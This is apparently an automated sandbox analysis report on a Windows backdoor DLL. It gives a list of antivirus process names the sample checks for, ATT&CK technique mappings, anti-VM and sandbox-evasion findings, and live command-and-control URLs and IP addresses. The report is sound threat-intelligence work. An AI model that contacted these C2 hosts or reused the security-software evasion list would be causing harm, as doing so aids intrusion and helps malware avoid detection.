    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163887034.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UmxFwHlp.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GUARDXSERVICE.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ClamTray.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ahnsdsv.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861533714.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562924841.0000025BF0130000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: psimsvc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862490782.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714628317.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088610386.0000025BF012D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PAVPRSRV.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASHSERV.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF00D3000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: msascui.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: F-STOPW.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414881638.0000025BEE292000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: guard.exe
    Source: rundll32.exe, 00000007.00000003.2335770527.000001F583DD7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DD7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2333913914.000001F583DC1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239256609.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371707051.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164057570.0000025BF012D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: cpf.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D6E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVP.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVuser.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pctsTray.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935104556.0000025BF00DE000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ccprovsp.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VRFWSVC.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KVMonXP.kxp
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521925258.0000025BF009A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E0000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCANWSCS.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VRMONNT.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521925258.0000025BF009A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE267000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SPYBOTSD.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ClamWin.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FProtTray.exe
Source: C:\Windows\System32\rundll32.exe
Code function: 6_2_00007FFD94641730 accept, WSAGetLastError, closesocket, bind, WSAGetLastError, closesocket, 6_2_00007FFD94641730
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 611 Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 1 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 831 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 113 System Information Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Behavior Graph (ID: 1578327; Sample: 8N8j6QojHn.exe; Startdate: 19/12/2024; Architecture: WINDOWS; Score: 96)
• Sample signatures: Multi AV Scanner detection for submitted file; Yara detected AntiVM3
• Sample DNS/IP: d2np1vqkcxhde6.cloudfront.net; o4508128816857088.ingest.de.sentry.io
• loaddll64.exe started: rundll32.exe, rundll32.exe, rundll32.exe, 5 other processes
• First rundll32.exe, signatures: Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines); Queries voltage information (via WMI often done to detect virtual machines); Queries memory information (via WMI often done to detect virtual machines); 3 other signatures
• Second rundll32.exe, DNS/IP: 195.133.1.117, 49785, 49821, 49856 (MTW-ASRU, Russian Federation); 13.227.9.48, 49909, 49945, 49976 (AMAZON-02US, United States); o4508128816857088.ingest.de.sentry.io 34.120.62.213, 443, 49769, 49933 (GOOGLEUS, United States)
• Second rundll32.exe, signatures: System process connects to network (likely due to code injection or exploit); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
• Third rundll32.exe, DNS/IP: d2np1vqkcxhde6.cloudfront.net 13.227.9.174, 49747, 49758, 49802 (AMAZON-02US, United States); 127.0.0.1 (unknown, unknown)
• 5 other processes started: WerFault.exe, WerFault.exe, rundll32.exe

Source | Detection | Scanner | Label | Link
8N8j6QojHn.dll | 55% | ReversingLabs | Win64.Backdoor.Bastdoor |

No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
d2np1vqkcxhde6.cloudfront.net | 13.227.9.174 | true | true | | unknown
o4508128816857088.ingest.de.sentry.io | 34.120.62.213 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://d2np1vqkcxhde6.cloudfront.net/ws | true | | unknown
http://195.133.1.117/ws | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/ | rundll32.exe (memory dumps) | false | | unknown
https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/d | rundll32.exe (memory dumps) | false | | unknown
https://docs.sentry.io/product/accounts/quotas/ | rundll32.exe (memory dumps) | false | | unknown
http://upx.sf.net | Amcache.hve.10.dr | false | | high
https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/Se | rundll32.exe (memory dumps) | false | | unknown
https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/dll | rundll32.exe (memory dumps) | false | | unknown
https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/e | rundll32.exe (memory dump) | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | rundll32.exe (memory dumps), 8N8j6QojHn.dll | false | | high
https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/e.mui? | rundll32.exe (memory dump) | false | | unknown

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
34.120.62.213 | o4508128816857088.ingest.de.sentry.io | United States | | 15169 | GOOGLEUS | false
195.133.1.117 | unknown | Russian Federation | | 48347 | MTW-ASRU | true
13.227.9.174 | d2np1vqkcxhde6.cloudfront.net | United States | | 16509 | AMAZON-02US | true
13.227.9.48 | unknown | United States | | 16509 | AMAZON-02US | true

IP
127.0.0.1

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578327
Start date and time: 2024-12-19 15:32:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 8N8j6QojHn.dll
(renamed file extension from exe to dll, renamed because original name is a hash value)
Original Sample Name: 6ad0ec9ca2464af8c9cddf6d8959850c7e106f2f.dll.exe
Detection: MAL
Classification: mal96.evad.winDLL@22/9@3/5
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.107.246.63, 20.231.128.67, 4.245.163.56
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: 8N8j6QojHn.dll

Time | Type | Description
09:33:37 | API Interceptor | 1x Sleep call for process: loaddll64.exe modified
09:33:41 | API Interceptor | 2x Sleep call for process: WerFault.exe modified

No context
                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                              MTW-ASRU | ET5.exe | Get hash | malicious | Unknown | Browse | 45.141.101.45
                              MTW-ASRU | la.bot.powerpc.elf | Get hash | malicious | Unknown | Browse | 193.124.107.252
                              MTW-ASRU | na.elf | Get hash | malicious | Unknown | Browse | 193.124.64.114
                              MTW-ASRU | la.bot.mips.elf | Get hash | malicious | Unknown | Browse | 193.124.64.126
                              MTW-ASRU | g082Q9DajU.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, PureLog Stealer | Browse | 195.133.48.136
                              MTW-ASRU | file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine | Browse | 195.133.48.136
                              MTW-ASRU | Set-up.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse | 195.133.48.136
                              MTW-ASRU | SecuriteInfo.com.Win32.TrojanX-gen.12944.32631.exe | Get hash | malicious | LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer | Browse | 195.133.48.136
                              MTW-ASRU | https://t.co/Tmh47fiTWd | Get hash | malicious | Unknown | Browse | 93.95.97.29
                              MTW-ASRU | PQ2AUndsdb.exe | Get hash | malicious | Amadey, AsyncRAT, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc | Browse | 195.133.48.136
                              AMAZON-02US | https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdf | Get hash | malicious | PDFPhish | Browse | 3.77.62.172
                              AMAZON-02US | setup.msi | Get hash | malicious | AteraAgent | Browse | 108.158.75.12
                              AMAZON-02US | powerpc.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 18.180.43.133
                              AMAZON-02US | sh4.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 34.212.245.104
                              AMAZON-02US | Last Annual payment.htm | Get hash | malicious | Phisher | Browse | 52.16.219.193
